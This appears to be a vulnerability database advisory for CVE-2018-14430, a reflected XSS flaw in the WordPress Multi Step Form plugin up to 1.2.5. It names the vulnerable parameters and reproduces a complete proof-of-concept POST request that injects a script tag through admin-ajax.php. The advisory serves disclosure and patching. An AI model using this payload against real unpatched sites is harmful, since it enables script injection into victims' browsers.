Multi Step Form <= 1.2.5 - Multiple Unauthenticated Reflected XSS



Description
WordPress Plugin Multi Step Form before 1.2.5 allows remote users to execute JavaScript code through Reflected XSS attacks.

This issue can be exploited by unauthenticated attackers, by the use of CSRF, for example.
Proof of Concept
The following parameters are vulnerable in fw_send_data function:
fw_data[id][1]
fw_data[id][2]
fw_data[id][3]
fw_data[id][4]
email
 
Proof of Concept (PoC):
The following POST request will cause it to display an alert in the browser when it runs:

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/2018/07/10/hola-mundo/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 207
Cookie: wp-settings-time-1=1531401661
Connection: close

action=fw_send_email&id=1&fw_data%5BTest%5D%5B0%5D%5B%5D=%3Cscript%3Ealert(1)%3C%2Fscript%3E&fw_data%5BTest%5D%5B1%5D%5B%5D=2&fw_data%5BTest%5D%5B2%5D%5B%5D=3%403.com&fw_data%5BTest%5D%5B3%5D%5B%5D=2018-07-20&email=3%403.com&nonce=ba16aeb8b0

Affects Plugin

fixed in version 1.2.6

References

CVE 2018-14430
URL https://hackpuntes.com/cve-2018-14430-wordpress-plugin-multi-step-form-125-multiples-xss-reflejados/
URL https://plugins.trac.wordpress.org/changeset/1917500/multi-step-form

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter Javier Olmedo
Submitter Website https://hackpuntes.com
Submitter Twitter JJavierOlmedo
Views 4893
Verified Yes
WPVDB ID 9106

Timeline

Publicly Published 2018-07-20 (about 1 year ago)
Added 2018-07-30 (about 1 year ago)
Last Updated 2018-08-28 (about 1 year ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin